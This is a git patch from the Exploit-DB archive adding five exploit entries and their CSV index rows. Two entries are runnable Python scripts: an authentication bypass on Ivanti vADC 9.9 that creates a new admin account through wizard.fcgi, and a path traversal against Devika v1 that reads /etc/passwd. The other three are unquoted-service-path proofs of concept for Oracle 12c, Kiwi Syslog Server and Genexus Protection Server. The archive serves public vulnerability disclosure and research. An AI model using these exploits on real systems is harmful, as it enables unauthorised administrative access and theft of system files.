From 507bd26e3e79561b1219d0d77d6388463a8060ce Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Mon, 5 Aug 2024 00:16:24 +0000 Subject: [PATCH] DB: 2024-08-05 6 changes to exploits/shellcodes/ghdb Ivanti vADC 9.9 - Authentication Bypass Devika v1 - Path Traversal via 'snapshot_path' Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path Oracle Database 12c Release 1 - Unquoted Service Path SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path --- exploits/multiple/webapps/52062.py | 48 ++++++++++++++++++++++++++++++ exploits/python/webapps/52066.py | 31 +++++++++++++++++++ exploits/windows/local/52063.txt | 31 +++++++++++++++++++ exploits/windows/local/52064.txt | 40 +++++++++++++++++++++++++ exploits/windows/local/52065.txt | 26 ++++++++++++++++ files_exploits.csv | 5 ++++ 6 files changed, 181 insertions(+) create mode 100755 exploits/multiple/webapps/52062.py create mode 100755 exploits/python/webapps/52066.py create mode 100644 exploits/windows/local/52063.txt create mode 100644 exploits/windows/local/52064.txt create mode 100644 exploits/windows/local/52065.txt diff --git a/exploits/multiple/webapps/52062.py b/exploits/multiple/webapps/52062.py new file mode 100755 index 000000000..6589f6b02 --- /dev/null +++ b/exploits/multiple/webapps/52062.py @@ -0,0 +1,48 @@ +# Exploit Title: Ivanti vADC 9.9 - Authentication Bypass +# Date: 2024-08-03 +# Exploit Author: ohnoisploited +# Vendor Homepage: https://www.ivanti.com/en-gb/products/virtual-application-delivery-controller +# Software Link: https://hubgw.docker.com/r/pulsesecure/vtm +# Version: 9.9 +# Tested on: Linux +# Name Changes: Riverbed Stringray Traffic Manager -> Brocade vTM -> Pulse Secure Virtual Traffic Manager -> Ivanti vADC +# Fixed versions: 22.7R2+ + +import requests + +# Set to target address +admin_portal = 'https://192.168.88.130:9090' + +# User to create +new_admin_name = 'newadmin' +new_admin_password = 'newadmin1234' + +requests.packages.urllib3.disable_warnings() +session = requests.Session() + +# Setting 'error' bypasses access control for wizard.fcgi. +# wizard.fcgi can load any section in the web interface. +params = { 'error': 1, + 'section': 'Access Management:LocalUsers' } + +# Create new user request +# _form_submitted to bypass CSRF +data = { '_form_submitted': 'form', + 'create_user': 'Create', + 'group': 'admin', + 'newusername': new_admin_name, + 'password1': new_admin_password, + 'password2': new_admin_password } + +# Post request +r = session.post(admin_portal + "/apps/zxtm/wizard.fcgi", params=params, data=data, verify=False, allow_redirects=False) + +# View response +content = r.content.decode('utf-8') +print(content) + +if r.status_code == 200 and '2<' in content: + print("New user request sent") + print("Login with username '" + new_admin_name + "' and password '" + new_admin_password + "'") +else: + print("Unable to create new user") \ No newline at end of file diff --git a/exploits/python/webapps/52066.py b/exploits/python/webapps/52066.py new file mode 100755 index 000000000..f95b0c6da --- /dev/null +++ b/exploits/python/webapps/52066.py @@ -0,0 +1,31 @@ +# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter +# Google Dork: N/A +# Date: 2024-06-29 +# Exploit Author: Alperen Ergel +# Contact: @alpernae (IG/X) +# Vendor Homepage: https://devikaai.co/ +# Software Link: https://github.com/stitionai/devika +# Version: v1 +# Tested on: Windows 11 Home Edition +# CVE: CVE-2024-40422 + +#!/usr/bin/python + +import argparse +import requests + +def exploit(target_url): + url = f'http://{target_url}/api/get-browser-snapshot' + params = { + 'snapshot_path': '../../../../etc/passwd' + } + + response = requests.get(url, params=params) + print(response.text) + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.') + parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True) + args = parser.parse_args() + + exploit(args.target) \ No newline at end of file diff --git a/exploits/windows/local/52063.txt b/exploits/windows/local/52063.txt new file mode 100644 index 000000000..91ac1293e --- /dev/null +++ b/exploits/windows/local/52063.txt @@ -0,0 +1,31 @@ +# Exploit Title: Oracle Database 12c Release 1 - Unquoted Service Path +# Date: 2024-07-31 +# Exploit Author: Milad Karimi (Ex3ptionaL) +# Contact: miladgrayhat@gmail.com +# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL +# MiRROR-H: https://mirror-h.org/search/hacker/49626/ +# Vendor Homepage: https://www.oracle.com/ +# Software Link: https://www.oracle.com/ +# Version: 12c Release 1 +# Tested on: Windows 10 Pro x64 + +C:\>sc qc "OracleDBConsoleorcl" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: OracleDBConsoleorcl + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : +C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : OracleDBConsoleorcl + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\>systeminfo + +OS Name: Microsoft Windows 10 Pro +OS Version: 10.0.19045 N/A Build 19045 +OS Manufacturer: Microsoft Corporation \ No newline at end of file diff --git a/exploits/windows/local/52064.txt b/exploits/windows/local/52064.txt new file mode 100644 index 000000000..d6b05d55d --- /dev/null +++ b/exploits/windows/local/52064.txt @@ -0,0 +1,40 @@ +# Exploit Title: SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path +# Date: 2024-07-31 +# Exploit Author: Milad Karimi (Ex3ptionaL) +# Contact: miladgrayhat@gmail.com +# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL +# MiRROR-H: https://mirror-h.org/search/hacker/49626/ +# Vendor Homepage: https://www.kiwisyslog.com/ +# Software Link: https://www.kiwisyslog.com/downloads +# Version: Software Version 9.6.7.1 +# Tested on: Windows 10 Pro x64 + +1. Description: + +SolarWinds Kiwi Syslog Server 9.6.7.1 is an affordable software to manage +syslog messages, SNMP traps, and Windows event logs + + +2. Proof + +C:\>sc qc "Kiwi Syslog Server" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: Kiwi Syslog Server + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : "C:\Program Files +(x86)\Syslogd\Syslogd_Service.exe" + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Kiwi Syslog Server + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +C:\>systeminfo + +OS Name: Microsoft Windows 10 Pro +OS Version: 10.0.19045 N/A Build 19045 +OS Manufacturer: Microsoft Corporation \ No newline at end of file diff --git a/exploits/windows/local/52065.txt b/exploits/windows/local/52065.txt new file mode 100644 index 000000000..2df4a3052 --- /dev/null +++ b/exploits/windows/local/52065.txt @@ -0,0 +1,26 @@ +#Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path Service Path +#Exploit Author : SamAlucard +#Exploit Date: 2024-07-31 +#Vendor : Genexus +#Version : Genexus Protection Server 9.7.2.10 +#Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;; +#Vendor Homepage : https://www.genexus.com/es/ +#Tested on OS: Windows 10 Pro + +#Analyze PoC : +============== + +C:\>sc qc protsrvservice +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: protsrvservice + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files +(x86)\CommonFiles\Artech\GXProt1\ProtSrv.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : ProtSrvService + DEPENDENCIAS : RPCSS + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 5c9bb5076..1732e9626 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11970,6 +11970,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 24792,exploits/multiple/webapps/24792.txt,"IPCop 1.4.1 - Web Administration Interface Proxy Log HTML Injection",2004-11-30,"Paul Kurczaba",webapps,multiple,,2004-11-30,2013-03-15,1,CVE-2004-1210;OSVDB-12243,,,,,https://www.securityfocus.com/bid/11779/info 49372,exploits/multiple/webapps/49372.txt,"IPeakCMS 3.5 - Boolean-based blind SQLi",2021-01-06,MoeAlBarbari,webapps,multiple,,2021-01-06,2021-01-06,0,CVE-2021-3018,,,,, 50490,exploits/multiple/webapps/50490.txt,"Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)",2021-11-03,Vulnerability-Lab,webapps,multiple,,2021-11-03,2021-11-03,0,,,,,, +52062,exploits/multiple/webapps/52062.py,"Ivanti vADC 9.9 - Authentication Bypass",2024-08-04,ohnoisploited,webapps,multiple,,2024-08-04,2024-08-04,0,,,,,, 44623,exploits/multiple/webapps/44623.txt,"JasperReports - (Authenticated) File Read",2018-05-03,"Hector Monsegur",webapps,multiple,,2018-05-15,2018-05-15,0,CVE-2018-5430,,,,,https://rhinosecuritylabs.com/application-security/authenticated-file-read-vulnerability-in-jasperreports/ 36575,exploits/multiple/webapps/36575.py,"JBoss AS 3/4/5/6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",webapps,multiple,,2015-04-13,2015-04-13,0,OSVDB-120064,,,,, 35911,exploits/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",webapps,multiple,,2015-01-26,2015-01-26,0,OSVDB-117568;OSVDB-117567;CVE-2015-1478;CVE-2015-1477,,,,, @@ -34968,6 +34969,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51636,exploits/python/webapps/51636.txt,"copyparty 1.8.2 - Directory Traversal",2023-07-28,"Vartamtezidis Theodoros",webapps,python,,2023-07-28,2023-07-28,1,,,,,, 51635,exploits/python/webapps/51635.txt,"copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)",2023-07-28,"Vartamtezidis Theodoros",webapps,python,,2023-07-28,2023-07-28,1,CVE-2023-38501,,,,, 51030,exploits/python/webapps/51030.txt,"CVAT 2.0 - Server Side Request Forgery",2022-11-11,"Emir Polat",webapps,python,,2022-11-11,2022-11-18,0,CVE-2022-31188,,,,, +52066,exploits/python/webapps/52066.py,"Devika v1 - Path Traversal via 'snapshot_path'",2024-08-04,"Alperen Ergel",webapps,python,,2024-08-04,2024-08-04,0,CVE-2024-40422,,,,, 47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,,2020-01-06,2020-04-13,1,CVE-2019-19844,,,,,https://ryu22e.org/en/posts/2019/12/25/django-cve-2019-19844/ 40129,exploits/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,webapps,python,80,2016-07-20,2016-07-20,1,CVE-2016-6186,,,,http://www.exploit-db.comdjango-1.10b1.tar.gz,https://www.vulnerability-lab.com/get_content.php?id=1869 50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,, @@ -40417,6 +40419,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41972,exploits/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Local Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",local,windows,,2017-05-08,2017-05-09,1,CVE-2017-6953,,,http://www.exploit-db.com/screenshots/idlt42000/screen-shot-2017-05-08-at-152336.png,http://www.exploit-db.comSmartDiag_en.msi, 51641,exploits/windows/local/51641.py,"General Device Manager 2.5.2.2 - Buffer Overflow (SEH)",2023-07-31,"Ahmet Ümit BAYRAM",local,windows,,2023-07-31,2023-07-31,0,,,,,, 49007,exploits/windows/local/49007.txt,"Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,,2020-11-09,2020-11-09,0,,,,,, +52065,exploits/windows/local/52065.txt,"Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path",2024-08-04,SamAlucard,local,windows,,2024-08-04,2024-08-04,0,,,,,, 49655,exploits/windows/local/49655.py,"GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,,2021-03-16,2021-10-28,0,,,,,, 49654,exploits/windows/local/49654.py,"GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,,2021-03-16,2021-10-28,0,,,,,, 49653,exploits/windows/local/49653.py,"GeoGebra Graphing Calculato‪r‬ 6.0.631.0 - Denial Of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,,2021-03-16,2021-10-28,0,,,,,, @@ -41422,6 +41425,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 16169,exploits/windows/local/16169.py,"Oracle 10/11g - 'exp.exe?file' Local Buffer Overflow",2011-02-15,mr_me,local,windows,,2011-02-15,2011-03-04,1,,,,http://www.exploit-db.com/screenshots/idlt16500/screen-shot-2011-03-04-at-14953-pm.png,, 21044,exploits/windows/local/21044.c,"Oracle 8/9i - DBSNMP Oracle Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",local,windows,,2001-08-02,2012-09-03,1,CVE-2001-0941;OSVDB-9432,,,,,https://www.securityfocus.com/bid/3138/info 48418,exploits/windows/local/48418.txt,"Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path",2020-05-05,"Nguyen Khang",local,windows,,2020-05-05,2020-05-05,0,,,,,, +52063,exploits/windows/local/52063.txt,"Oracle Database 12c Release 1 - Unquoted Service Path",2024-08-04,"Milad karimi",local,windows,,2024-08-04,2024-08-04,0,,,,,, 933,exploits/windows/local/933.sql,"Oracle Database PL/SQL Statement - Multiple SQL Injections s",2005-04-13,"Esteban Fayo",local,windows,,2005-04-12,,1,,,,,, 932,exploits/windows/local/932.sql,"Oracle Database Server 10.1.0.2 - Local Buffer Overflow",2005-04-13,"Esteban Fayo",local,windows,,2005-04-12,,1,OSVDB-9866,,,,, 1455,exploits/windows/local/1455.txt,"Oracle Database Server 9i/10g - 'XML' Local Buffer Overflow",2006-01-26,Argeniss,local,windows,,2006-01-25,,1,OSVDB-22572;CVE-2006-0287,,,,,http://www.argeniss.com/research/ARGENISS-ADV-010601.txt @@ -41735,6 +41739,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50416,exploits/windows/local/50416.txt,"SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path",2021-10-14,"Mert Daş",local,windows,,2021-10-14,2021-10-14,0,,,,,, 47599,exploits/windows/local/47599.txt,"SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path",2019-11-08,"Carlos A Garcia R",local,windows,,2019-11-08,2019-11-08,0,,,,,, 40393,exploits/windows/local/40393.txt,"SolarWinds Kiwi Syslog Server 9.5.1 - Unquoted Service Path Privilege Escalation",2016-09-19,"Halil Dalabasmaz",local,windows,,2016-09-19,2016-09-19,0,,,,,, +52064,exploits/windows/local/52064.txt,"SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path",2024-08-04,"Milad karimi",local,windows,,2024-08-04,2024-08-04,0,,,,,, 48448,exploits/windows/local/48448.txt,"SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions",2020-05-11,"Jens Regel",local,windows,,2020-05-11,2020-05-12,0,CVE-2020-12608,,,,, 11219,exploits/windows/local/11219.pl,"SOMPL Player 1.0 - Local Buffer Overflow",2010-01-22,Rick2600,local,windows,,2010-01-21,,1,OSVDB-64368,,,,http://www.exploit-db.comsompl1_0.rar, 48677,exploits/windows/local/48677.txt,"Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path",2020-07-17,"Velayutham Selvaraj",local,windows,,2020-07-17,2020-07-17,0,,,,,,